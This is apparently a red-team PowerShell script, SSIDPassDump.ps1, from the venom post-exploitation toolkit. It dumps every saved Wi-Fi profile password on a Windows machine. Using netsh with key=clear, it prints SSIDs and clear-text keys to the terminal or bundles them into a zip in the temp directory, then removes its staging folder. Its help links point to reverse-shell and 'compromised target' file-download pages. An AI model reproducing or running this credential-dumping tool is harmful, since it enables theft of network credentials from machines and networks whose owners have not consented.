SSIDPassDump.ps1

1. <#
2. .SYNOPSIS
3.    cmdlet to dump SSID Wifi profiles passwords
4.  
5.    Author: r00t-3xp10it (SSA RedTeam @2020)
6.    Tested Under: Windows 10 - Build 18363
7.    Required Dependencies: netsh
8.    Optional Dependencies: none
9.    PS cmdlet Dev version: v1.0
10.  
11. .DESCRIPTION
12.    cmdlet to dump SSID Wifi profiles passwords into terminal windows
13.    or dump credentials into a zip file under $Env:TMP directory.
14.  
15. .EXAMPLE
16.    PS C:\> Get-Help .\SSIDPassDump.ps1 -full
17.    Access This cmdlet Comment_Based_Help
18.  
19. .EXAMPLE
20.    PS C:\> .\SSIDPassDump.ps1 -FileName MyDump.zip
21.    This parameter can only be used with [<-DumpType Zip>]
22.    parameter to be abble to rename the zip dump file
23.  
24. .EXAMPLE
25.    PS C:\> .\SSIDPassDump.ps1 -DumpType Terminal
26.    Display SSID Wifi passwords dump into terminal windows
27.  
28. .EXAMPLE
29.    PS C:\> .\SSIDPassDump.ps1 -DumpType Zip
30.    Dump SSID Wifi profiles passwords into a zip file
31.  
32. .EXAMPLE
33.    PS C:\> .\SSIDPassDump.ps1 -DumpType Zip -Storage $Env:USERPROFILE\Desktop
34.    Dump SSID Wifi profiles passwords into a zip file and
35.    store zip file under the sellected directory.
36.  
37. .INPUTS
38.    None. You cannot pipe objects into webserver.ps1
39.  
40. .OUTPUTS
41.    This cmdlet does not produce outputs if used
42.    [< -DumpType Zip >] cmdlet parameter
43.  
44. .LINK
45.     https://github.com/r00t-3xp10it/venom
46.     https://github.com/r00t-3xp10it/venom/tree/master/aux/webserver.ps1
47.     https://github.com/r00t-3xp10it/venom/wiki/CmdLine-&-Scripts-for-reverse-TCP-shell-addicts
48.     https://github.com/r00t-3xp10it/venom/wiki/cmdlet-to-download-files-from-compromised-target-machine
49. #>
50.  
51. ## Non Positional cmdlet named parameters
52. [CmdletBinding(PositionalBinding=$false)] param(
53.    [string]$FileName="SSIDump.zip",
54.    [string]$DumpType="Terminal",
55.    [string]$Storage="$Env:TMP"
56. )
57.  
58. $Initial_Path = (pwd).Path
59. ## Capture wlan interface passwords (SSID Keys)
60. If($DumpType -ieq "Terminal"){
61.    ## Display SSID Wifi passwords dump into terminal windows
62.    $profiles = netsh wlan show profiles|findstr /C:"All User Profile"
63.    $DataParse = $profiles -replace 'All User Profile     :','' -replace ' ',''
64.  
65.    ## Create Data Table for output
66.    $mytable = new-object System.Data.DataTable
67.    $mytable.Columns.Add("SSID name") | Out-Null
68.    $mytable.Columns.Add("Password") | Out-Null
69.  
70.    foreach($Token in $DataParse){
71.       $DataToken = netsh wlan show profile name="$Token" key=clear|findstr /C:"Key Content"
72.       $Key = $DataToken -replace 'Key Content            : ','' -replace ' ',''
73.       ## Put results in the data table  
74.       $mytable.Rows.Add("$Token",
75.                         "$Key") | Out-Null
76.    }
77.    ## Display Table
78.    $mytable|Format-Table -AutoSize
79. }Else{
80.    ## Dump SSID Wifi profiles passwords into a zip file
81.    If(-not(Test-Path "$Storage\SSIDump")){New-Item "$Storage\SSIDump" -ItemType Directory -Force|Out-Null}
82.    cd $Storage\SSIDump;netsh wlan export profile folder=$Storage\SSIDump key=clear|Out-Null
83.    Compress-Archive -Path "$Storage\SSIDump" -DestinationPath "$Storage\$FileName"
84.    Write-Host "SSID Dump stored under: $Storage\$FileName" -ForeGroundColor Yellow
85.    cd $Initial_Path
86. }
87. If(Test-Path "$Storage\SSIDump"){Start-Sleep -Seconds 2;Remove-Item "$Storage\SSIDump" -Recurse -Force|Out-Null}
88.